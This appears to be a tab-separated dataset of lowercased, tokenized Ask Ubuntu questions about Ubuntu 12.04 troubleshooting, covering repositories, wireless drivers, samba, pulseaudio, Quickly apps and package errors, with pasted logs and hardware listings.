160511	why does add-apt-repository fail to add source repositories ?	add-apt-repository throws an error if i try to add a source repository : this works : sudo add-apt-repository 'deb http : //dl.ajaxplorer.info/repos/apt squeeze main' this fails with an error : sudo add-apt-repository 'deb-src http : //dl.ajaxplorer.info/repos/apt squeeze main' error : 'deb-src http : //dl.ajaxplorer.info/repos/apt squeeze main ' invalid leaving off the quotes does n't help : sudo add-apt-repository deb-src http : //dl.ajaxplorer.info/repos/apt squeeze main error : need a repository as argument
160512	how to show desktop files on both monitors when using dual display ?	how do i get the computer to show desktop files on both monitors when using dual display ? i can only see the files on one of the monitors . the other one has a blank desktop .
160514	indicator weather icon does n't show up	i just installed the applet using the terminal like this : sudo apt-get install indicator-weather after installing it , i did n't see the icon showing . i thought that after restarting the computer , the icon might show up , but it did n't . was i supposed to do something after installing the applet ? or did i do something wrong ?
160517	why does my quickly app install in /usr/bin instead of /opt ?	as i 've finished my app for the app showdown , i ran quickly submitubuntu , but i found that my app is installed inside /usr/bin . what ? i need it at /opt ! how can i fix this ?
160520	hp pavilion g series wireless switch	on my hp laptop , the wireless switch is the f12 key , which works fine on my windows partition , but not in ubuntu 12.04 . ubuntu tells me that the wireless is disabled by the hardware switch ( f12 ) , which does not respond when i press it . there is a red light that is on when the switch is off , and it should turn to green when it is activated . i have tried solutions offered elsewhere , including sudo rfkill unblock all . when i input sudo rfkill list all , it says that there is neither a soft or hard block . thanks !
160521	quickly : logging from python application	consider the following truncated source file ( an empty quickly application with unnecessary lines stripped ) : import logging logger = logging.getlogger ( 'foobar ' ) class foobarwindow ( window ) : __gtype_name__ = `` foobarwindow '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the main window '' '' '' super ( foobarwindow , self ) .finish_initializing ( builder ) # code for other initialization actions should be added here . logger.info ( `` hello world from the logger '' ) the whole code is already in the quickly template , only the call to logger.info has been added . but i do n't see any console output and i have not seen any logfile . could somebody elaborate on logging practice in applications created with quickly ? thank you !
160522	python gtk event ignore	i would like to ignore some key events in a text view , now i do the following def on_key_press_event ( self , source , event ) : keyname = gdk.keyval_name ( event.keyval ) if ( keyname== '' return '' ) : tv = self.builder.get_object ( 'txtmsg ' ) buf = tv.get_buffer ( ) msg = buf.get_text ( buf.get_start_iter ( ) , buf.get_end_iter ( ) , self ) msg=msg.replace ( `` \n '' , '' '' ) buf.set_text ( msg ) is there any function equivalent to java function event.consume ( ) in python ?
160523	quantal : broken apt-index , cant fix dependencies	i ca n't seem to add/remove/update packages ubuntu software update has a notice about partial upgrades but fails seems to be similar to this problem $ sudo apt-get update ign http : //archive.ubuntu.com quantal inrelease ign http : //security.ubuntu.com precise-security inrelease ign http : //us.archive.ubuntu.com precise inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //us.archive.ubuntu.com precise-updates inrelease ign http : //us.archive.ubuntu.com precise-backports inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //archive.canonical.com precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease hit http : //archive.ubuntu.com quantal release.gpg get:1 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] hit http : //extras.ubuntu.com precise release.gpg get:2 http : //us.archive.ubuntu.com precise release.gpg [ 198 b ] get:3 http : //us.archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //archive.canonical.com precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release.gpg hit http : //archive.ubuntu.com quantal release get:4 http : //security.ubuntu.com precise-security release [ 49.6 kb ] get:5 http : //us.archive.ubuntu.com precise-backports release.gpg [ 198 b ] get:6 http : //us.archive.ubuntu.com precise release [ 49.6 kb ] hit http : //extras.ubuntu.com precise release hit http : //archive.canonical.com precise release hit http : //ppa.launchpad.net precise release.gpg hit http : //ppa.launchpad.net precise release hit http : //archive.ubuntu.com quantal/main amd64 packages hit http : //extras.ubuntu.com precise/main sources hit http : //archive.canonical.com precise/partner sources hit http : //ppa.launchpad.net precise release hit http : //ppa.launchpad.net precise release get:7 http : //us.archive.ubuntu.com precise-updates release [ 49.6 kb ] hit http : //extras.ubuntu.com precise/main amd64 packages hit http : //extras.ubuntu.com precise/main i386 packages hit http : //archive.ubuntu.com quantal/main i386 packages hit http : //archive.ubuntu.com quantal/main translation-en hit http : //archive.canonical.com precise/partner amd64 packages hit http : //archive.canonical.com precise/partner i386 packages hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages get:8 http : //us.archive.ubuntu.com precise-backports release [ 49.6 kb ] hit http : //ppa.launchpad.net precise/main sources get:9 http : //security.ubuntu.com precise-security/main sources [ 22.5 kb ] hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages hit http : //ppa.launchpad.net precise/main sources hit http : //ppa.launchpad.net precise/main amd64 packages hit http : //ppa.launchpad.net precise/main i386 packages get:10 http : //us.archive.ubuntu.com precise/main sources [ 934 kb ] get:11 http : //security.ubuntu.com precise-security/restricted sources [ 14 b ] get:12 http : //security.ubuntu.com precise-security/universe sources [ 7,832 b ] ign http : //archive.ubuntu.com quantal/main translation-en_us get:13 http : //security.ubuntu.com precise-security/multiverse sources [ 713 b ] get:14 http : //security.ubuntu.com precise-security/main amd64 packages [ 67.8 kb ] ign http : //archive.canonical.com precise/partner translation-en_us get:15 http : //security.ubuntu.com precise-security/restricted amd64 packages [ 14 b ] get:16 http : //security.ubuntu.com precise-security/universe amd64 packages [ 18.8 kb ] ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //archive.canonical.com precise/partner translation-en get:17 http : //security.ubuntu.com precise-security/multiverse amd64 packages [ 1,155 b ] get:18 http : //security.ubuntu.com precise-security/main i386 packages [ 70.2 kb ] ign http : //extras.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us get:19 http : //security.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:20 http : //security.ubuntu.com precise-security/universe i386 packages [ 19.0 kb ] get:21 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 1,394 b ] ign http : //ppa.launchpad.net precise/main translation-en hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //security.ubuntu.com precise-security/main translation-en_us ign http : //security.ubuntu.com precise-security/multiverse translation-en_us ign http : //security.ubuntu.com precise-security/restricted translation-en_us ign http : //security.ubuntu.com precise-security/universe translation-en_us get:22 http : //us.archive.ubuntu.com precise/restricted sources [ 5,470 b ] get:23 http : //us.archive.ubuntu.com precise/universe sources [ 5,019 kb ] get:24 http : //us.archive.ubuntu.com precise/multiverse sources [ 155 kb ] get:25 http : //us.archive.ubuntu.com precise/main amd64 packages [ 1,273 kb ] get:26 http : //us.archive.ubuntu.com precise/restricted amd64 packages [ 8,452 b ] get:27 http : //us.archive.ubuntu.com precise/universe amd64 packages [ 4,786 kb ] get:28 http : //us.archive.ubuntu.com precise/multiverse amd64 packages [ 119 kb ] get:29 http : //us.archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] get:30 http : //us.archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:31 http : //us.archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:32 http : //us.archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] hit http : //us.archive.ubuntu.com precise/main translation-en hit http : //us.archive.ubuntu.com precise/multiverse translation-en hit http : //us.archive.ubuntu.com precise/restricted translation-en hit http : //us.archive.ubuntu.com precise/universe translation-en get:33 http : //us.archive.ubuntu.com precise-updates/main sources [ 124 kb ] get:34 http : //us.archive.ubuntu.com precise-updates/restricted sources [ 1,379 b ] get:35 http : //us.archive.ubuntu.com precise-updates/universe sources [ 30.9 kb ] get:36 http : //us.archive.ubuntu.com precise-updates/multiverse sources [ 1,058 b ] get:37 http : //us.archive.ubuntu.com precise-updates/main amd64 packages [ 311 kb ] get:38 http : //us.archive.ubuntu.com precise-updates/restricted amd64 packages [ 2,417 b ] get:39 http : //us.archive.ubuntu.com precise-updates/universe amd64 packages [ 85.4 kb ] get:40 http : //us.archive.ubuntu.com precise-updates/multiverse amd64 packages [ 1,829 b ] get:41 http : //us.archive.ubuntu.com precise-updates/main i386 packages [ 314 kb ] get:42 http : //us.archive.ubuntu.com precise-updates/restricted i386 packages [ 2,439 b ] get:43 http : //us.archive.ubuntu.com precise-updates/universe i386 packages [ 85.9 kb ] get:44 http : //us.archive.ubuntu.com precise-updates/multiverse i386 packages [ 2,047 b ] hit http : //us.archive.ubuntu.com precise-updates/main translation-en hit http : //us.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //us.archive.ubuntu.com precise-updates/restricted translation-en hit http : //us.archive.ubuntu.com precise-updates/universe translation-en get:45 http : //us.archive.ubuntu.com precise-backports/main sources [ 1,845 b ] get:46 http : //us.archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:47 http : //us.archive.ubuntu.com precise-backports/universe sources [ 11.1 kb ] get:48 http : //us.archive.ubuntu.com precise-backports/multiverse sources [ 1,383 b ] get:49 http : //us.archive.ubuntu.com precise-backports/main amd64 packages [ 1,271 b ] get:50 http : //us.archive.ubuntu.com precise-backports/restricted amd64 packages [ 14 b ] get:51 http : //us.archive.ubuntu.com precise-backports/universe amd64 packages [ 9,701 b ] get:52 http : //us.archive.ubuntu.com precise-backports/multiverse amd64 packages [ 996 b ] get:53 http : //us.archive.ubuntu.com precise-backports/main i386 packages [ 1,271 b ] get:54 http : //us.archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:55 http : //us.archive.ubuntu.com precise-backports/universe i386 packages [ 9,703 b ] get:56 http : //us.archive.ubuntu.com precise-backports/multiverse i386 packages [ 999 b ] hit http : //us.archive.ubuntu.com precise-backports/main translation-en hit http : //us.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //us.archive.ubuntu.com precise-backports/restricted translation-en hit http : //us.archive.ubuntu.com precise-backports/universe translation-en ign http : //us.archive.ubuntu.com precise/main translation-en_us ign http : //us.archive.ubuntu.com precise/multiverse translation-en_us ign http : //us.archive.ubuntu.com precise/restricted translation-en_us ign http : //us.archive.ubuntu.com precise/universe translation-en_us ign http : //us.archive.ubuntu.com precise-updates/main translation-en_us ign http : //us.archive.ubuntu.com precise-updates/multiverse translation-en_us ign http : //us.archive.ubuntu.com precise-updates/restricted translation-en_us ign http : //us.archive.ubuntu.com precise-updates/universe translation-en_us ign http : //us.archive.ubuntu.com precise-backports/main translation-en_us ign http : //us.archive.ubuntu.com precise-backports/multiverse translation-en_us ign http : //us.archive.ubuntu.com precise-backports/restricted translation-en_us ign http : //us.archive.ubuntu.com precise-backports/universe translation-en_us fetched 19.9 mb in 34s ( 571 kb/s ) reading package lists ... done $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : netbase : breaks : ifupdown ( < 0.7 ) breaks : ifupdown : i386 ( < 0.7 ) e : unmet dependencies . try using -f. $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : dh-apparmor html2text libmail-sendmail-perl libsys-hostname-long-perl use 'apt-get autoremove ' to remove them . the following extra packages will be installed : ifupdown suggested packages : rdnssd the following packages will be upgraded : ifupdown 1 upgraded , 0 newly installed , 0 to remove and 1179 not upgraded . 85 not fully installed or removed . need to get 0 b/54.1 kb of archives . after this operation , 19.5 kb of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 222498 files and directories currently installed . ) preparing to replace ifupdown 0.7~beta2ubuntu8 ( using ... /ifupdown_0.7.1ubuntu1_amd64.deb ) ... unpacking replacement ifupdown ... dpkg : error processing /var/cache/apt/archives/ifupdown_0.7.1ubuntu1_amd64.deb ( -- unpack ) : trying to overwrite '/etc/init.d/networking ' , which is also in package netbase 5.0ubuntu1 processing triggers for man-db ... processing triggers for ureadahead ... errors were encountered while processing : /var/cache/apt/archives/ifupdown_0.7.1ubuntu1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise universe deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.ubuntu.com/ubuntu/ quantal main
160524	using three finger swipe	i liked having a three finger swipe up to spread all open windows and having a three finger swipe down minimize all windows . is there a way i can implement this in ubuntu 12.04 ?
160525	wifi stops working after a while in lenovo thinkpad w520 ( ubuntu 12.04 )	after several minutes ( i do not know how many ) there is no internet connection on my laptop via wi-fi.ubuntu does n't show any kind of message that my wifi was disconnected neither there is a signal drop , but suddenly firefox stops connecting to web pages.i checked my modem/router and it seems that it is working fine.i tried also to reboot the wifi device and nothing happens.the only thing that it makes it work again is a reboot of the system and if i do not want to do a reboot then i am enforced to connect to the internet using ethernet cable.does anybody know what is happening ? # # some hardware info that might be helpful # # el10780 @ thinkpad-w520 : ~ $ sudo lshw -class network *-network description : ethernet interface product : 82579lm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : f0 : de : f1 : f1 : be:10 size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.5.1-k duplex=full firmware=0.13-3 ip=192.168.0.10 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:50 memory : f3a00000-f3a1ffff memory : f3a2b000-f3a2bfff ioport:6080 ( size=32 ) *-network description : wireless interface product : centrino advanced-n + wimax 6250 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 5e serial : 64:80:99:63:14:74 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-26-generic firmware=41.28.5.1 build 33926 ip=192.168.0.6 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:52 memory : f3900000-f3901fff *-network description : ethernet interface physical id : 1 bus info : usb @ 2:1.3 logical name : wmx0 serial : 00:1d : e1:53 : b2 : e8 capabilities : ethernet physical configuration : driver=i2400m firmware=i6050-fw-usb-1.5.sbcf link=no el10780 @ thinkpad-w520 : ~ $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation 6 series/c200 series chipset family kt controller ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b4 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b4 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b4 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b4 ) 00:1c.6 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 7 ( rev b4 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qm67 express chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 04 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ quadro 1000m ] ( rev a1 ) 03:00.0 network controller : intel corporation centrino advanced-n + wimax 6250 ( rev 5e ) 0d:00.0 system peripheral : ricoh co ltd device e823 ( rev 08 ) 0d:00.3 firewire ( ieee 1394 ) : ricoh co ltd r5c832 pcie ieee 1394 controller ( rev 04 ) 0e:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) el10780 @ thinkpad-w520 : ~ $ rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : i2400m-usb:2-1.3:1.0 : wimax soft blocked : yes hard blocked : no the weirdest thing is this screenshot which i took after running the **additional drivers** program.i mean i have a nvidia quadro 1000m and my intel centrino wifi card and this shows that there are not proprietay drivers for my system . http : //imageshack.us/photo/my-images/268/screenshotfrom201207062.png/
160532	why is the u1 sharing dialog so unhelpful ?	on the web , it is very easy to share a folder from ubuntu one with another user ( more > share folder and enter email address ) . however , on the desktop right-clicking a folder , selecting ubuntu one > share brings up a window that looks like this : it is utterly unhelpful , not even providing a field to enter an email address . can anyone else make sense of this ?
160535	how do i add the mainline kernel ppa ?	how can i add the mainline kernel ppa to the synaptic software sources ? i have the url : http : //kernel.ubuntu.com/~kernel-ppa/mainline/ but i am missing the ppa : line .
160550	youtube runs very slowly on all web browsers ubuntu 12.04 lts	i installed ubuntu 12.04 lts last week , and it has been running fine . however , whenever i try to view a video on youtube , there are huge amounts of lag , with the picture often freezing when in full-screen mode . the videos however appear to be loading as normal . i have no such issues in windows 7 . my graphics card is an nvidia geforce 8600m gt . i installed the standard proprietary driver for it in ubuntu 's additional drivers section before i ever attempted to view videos , and it has a green light next to it indicating it is active . however , when i go to system information , the graphics card is listed as unknown , and the additional drivers app describes it only as a geforce rather than the specific model number . this problem occurs in all 3 browsers i have tried - firefox , chrome and chromium . i had flash player installed when attempting in firefox and chromium , and it is built into chrome and was activated . i have not yet tried to view videos from any other source . how can i resolve this ?
160554	how to pipe html to gedit with format/spacing ?	is there a way to pipe html to gedit witout losing the spacing . i am trying with : echo `` '+html5template+ ' '' | gedit the output is like this : < ! doctype html > < html > < head > < title > < /title > < /head > < body > < /body > < /html > but i need it to be like this : < ! doctype html > < html > < head > < title > < /title > < /head > < body > < /body > < /html > the script look like this : doctype= ' < ! doctype html > ' html_start= ' < html > ' header_start= ' < head > ' header_end= ' < /head > ' body= ' < body > < /body > ' html_end= ' < /html > ' meta_data= '' # get page title meta_data += ' < title > '+self.builder.get_object ( `` page_title_entry '' ) .get_text ( ) + ' < /title > ' # build the html template html5template=doctype+html_start+header_start+meta_data+header_end+body+html_end # open template with gedit popen ( 'echo `` '+html5template+ ' '' | gedit ' , shell=true , stdin=pipe , stdout=pipe , stderr=stdout , close_fds=false )
160557	ca n't install gems from behind proxy	i 'm running 12.04 in a vm , and i am behind a corporate proxy . i 've got the environment variables set ( tried both all lower and all upper case for [ http|https|ftp ] _proxy , as well as not specifying the user : pass but setting http_proxy_ [ user|pass ] ) i can access the web via curl/wget , and i have also gotten apt to use my proxy settings . but i have been unable to get gem to install , or even list , any remote gems . when i do try , i get the following : $ sudo gem install hiera error : could not find a valid gem 'hiera ' ( > = 0 ) in any repository error : while executing gem ... ( gem : :remotefetcher : :fetcherror ) errno : :econnrefused : connection refused - connect ( 2 ) ( http : //rubygems.org/latest_specs.4.8.gz ) and $ sudo gem list -r *** remote gems *** error : while executing gem ... ( gem : :remotefetcher : :fetcherror ) errno : :econnrefused : connection refused - connect ( 2 ) ( http : //rubygems.org/latest_specs.4.8.gz ) i did some searching on stackoverflow and have tried everything that did not require setting up a vpn or tunnel or external programs . is there something i am missing , or something about the env variables i have wrong ? update forgot to mention , i am able to download gems from my host workstation and install them that way , but i 'd prefer to be able to install directly if at all possible . it 's a hassle , especially when there are a lot of deps involved . also , for what it is worth : $ gem -- version 1.8.15
160558	samba fileshare playing nice with windows users and accounts	i have been reading article after article and asking around in the chats for help on why this is not working : ( here is what i 've done so far : i have installed samba following the server guide in the first link posted . i have edited my smb.conf file.. here is ( what i think ) is the relevant part of that for you to see.. [ homes ] comment = home directories browsable = no writable = yes valid users = % s valid users = mydomain\ % s create mask = 0755 directory mask = 0755 i have created a user running sudo adduser wks . this successfully adds the user and creates the home folder with group and user permissions set to `` wks '' . now i add that same user to samba smbpasswd -a wks no errors all seems to go well . ok so from here i should be at the very least be able to goto a windows machine , open up the network computers , find the server , and open the home folder for `` wks '' ? ? at the moment i can do all of these things but access the home folder ( even with the username and password i set in the previous steps ) . have i missed something trivial ? was that a bad tutorial to read from ? i am confused how to proceed from here . to summarize : the user wks ( this happens to also be the windows credentials . ) with the supplied password still does not have permission to access the home folder while accessing it with windows . edit i double checked on windows to make sure i was seeing it in the workgroup ... i am not . is there a step i missed ? in smb.conf i have workgroup = dmsi and the windows computers are all part of that workgroup .
160561	removing my app from ubuntu 's ppa	as i 've sent my app to ubuntu 's ppa using quickly submitubuntu and its version was wrong ( 12.07 ... right is 0.1 ! ) details of the app : virtuam 0.1 developed with quickly ( python/gtk+3 ) uploaded ( as i said ) with quickly submitubuntu the app is not in myapps or in launchpad ( i removed it from lp ) i say that it was sent to ubuntu 's ppa because i saw a message about it was pending of review in the terminal ... maybe i 'm wrong and i can finish without worring about that : /
160568	ubuntu 12.04 nvidia geforce go 7600 black screen during boot	i 'm using ubuntu as the only operating system since two years . in the first ubuntu versions i had seen my bios screen and the boot screens . actually im using ubuntu 12.04 and my screen stays black until ubuntu is started ( both screens are missing ) . i guess this situation appeared the first time in ubuntu 11 ( not sure ) . i searched via google and tried the popular activities but was not able to fix my issue . i opened the laptop and checked all connections . i 'm using boot option nomodeset . i had a look through many many web pages . i do n't know how to continue and hope somebody could be helpful . my hardware : acer aspire 9300 amd turion 64 x2 nvidia geforce go 7600 ( using proposed driver ) lspci | grep nvidia 00:00.0 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.1 ram memory : nvidia corporation c51 memory controller 0 ( rev a2 ) 00:00.2 ram memory : nvidia corporation c51 memory controller 1 ( rev a2 ) 00:00.3 ram memory : nvidia corporation c51 memory controller 5 ( rev a2 ) 00:00.4 ram memory : nvidia corporation c51 memory controller 4 ( rev a2 ) 00:00.5 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.6 ram memory : nvidia corporation c51 memory controller 3 ( rev a2 ) 00:00.7 ram memory : nvidia corporation c51 memory controller 2 ( rev a2 ) 00:02.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:03.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:04.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:09.0 ram memory : nvidia corporation mcp51 host bridge ( rev a2 ) 00:0a.0 isa bridge : nvidia corporation mcp51 lpc bridge ( rev a3 ) 00:0a.1 smbus : nvidia corporation mcp51 smbus ( rev a3 ) 00:0a.3 co-processor : nvidia corporation mcp51 pmu ( rev a3 ) 00:0b.0 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0b.1 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0d.0 ide interface : nvidia corporation mcp51 ide ( rev f1 ) 00:0e.0 ide interface : nvidia corporation mcp51 serial ata controller ( rev f1 ) 00:10.0 pci bridge : nvidia corporation mcp51 pci bridge ( rev a2 ) 00:10.1 audio device : nvidia corporation mcp51 high definition audio ( rev a2 ) 00:14.0 bridge : nvidia corporation mcp51 ethernet controller ( rev a3 ) 03:00.0 vga compatible controller : nvidia corporation g73 [ geforce go 7600 ] ( rev a1 ) so my question is what to do to fix the black screen during boot ?
160569	ubuntu audio mysteriously stopped working ( 12.04 )	well , i 've been a user of ubuntu 12.04 lts since april now , and it 's been a very pleasant experience . i 'm a big fan of electronic music , and i tend to have my tracks playing in the background while i do things on my laptop , either in youtube or in clementine , my default music player . all has worked very well until now . a couple of days ago my entire pc started to lag really badly . almost everything was unusable . i opened up system monitor via the terminal to find a process called `` pulseaudio '' using nearly 1gb of ram and over 80 % of my cpu . i needed to get some important work done and so i killed the process without thinking . once again today , pulseaudio decided to lag the hell out of my pc , and so i killed it again . nothing seemed to happen immediately , but once i opened up youtube all the audio on videos stuttered a lot , while the videos played smoothly . i restarted firefox to find that the audio was now not working at all , with both headphones and speakers , and the volume up quite a bit ( it 's not muted , i 've checked that ! ) . a little bit of research later and i 've discovered that pulseaudio plays an important part in ubuntu 's audio . even after restarting my pc the audio still ceases to work in any applications or with any output . the pulseaudio process refuses to start up again . so , can you help me out here ? what can i do to fix my problem , and why was pulseaudio doing this in the first place ?
160570	is ubuntu 10.04 available on cd ?	i recently downloaded and burned ubuntu 10.04 to a cd . i installed it , at least that was the feedback i got from the computer . when i started up the computer again , ubuntu did n't boot up and i found out that ubuntu was n't installed after all . is it possible to get an ubuntu xd / dvd ? i assume the download is a demo file only now .
160574	stop ubuntuone from autostart	i want to stop ubuntuone from autostart . i have already tried the suggestions from this answer but it did n't help me . my current status is that i have deleted the ubuntuone-launch.desktop file from /etc/xdg/autostart but the service still start 's at log-in . any suggestions before purging it ?
160581	why do i end up at the console login instead of the graphical desktop ?	i do n't think this is the usual login for ubuntu .
160583	thunderbird looses menu in the panel	i have installed the add-ons minimizedtotray revived 1.0.1 to thunderbird , as suggested here . even though the main functionality of hiding tbird to the tray works well , after a while ( minutes ) on maximizing it , the menus of tbird are gone form the unity panel . so i have no file/edit/view ... etc menus . that kills the joy of minimizing it to the tray a bit . is there a problem between this add-on and unity on 12.04 ?
160586	why does n't wireless work on wubi 12.04 with a broadcom bcm4312 card ?	i have recently set up ubuntu 12.04 on my laptop using the wubi installer . i am having a very difficult time setting up a wireless internet connection . i am currently set up with an ethernet connection which i have used to download all new updates and to activate the broadcom sta wireless driver . i have tried several things in the terminal based on other people 's posts : ~ $ rfkill list 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : yes ~ $ rfkill unblock all it does n't change anything . i also tried rebooting and connecting to the internet on my windows vista os , and it worked , so i know that the connection should not be hard blocked . i have also tried installing b43 firmware ( lp/phy version ) that is supposed to work with my chip ( bcm4312 ) . it seems to have no effect . then i tried : ~ $ iwconfig lo no wireless extensions . eth1 ieee 802.11 access point : not-associated link quality:5 signal level:0 noise level:0 rx invalid nwid:0 invalid crypt:0 invalid misc:0 eth0 no wireless extensions . this is my first time trying to work with ubuntu , so i would appreciate any help . thanks . also sorry this is poorly formatted . i 'm having troubles with that too .
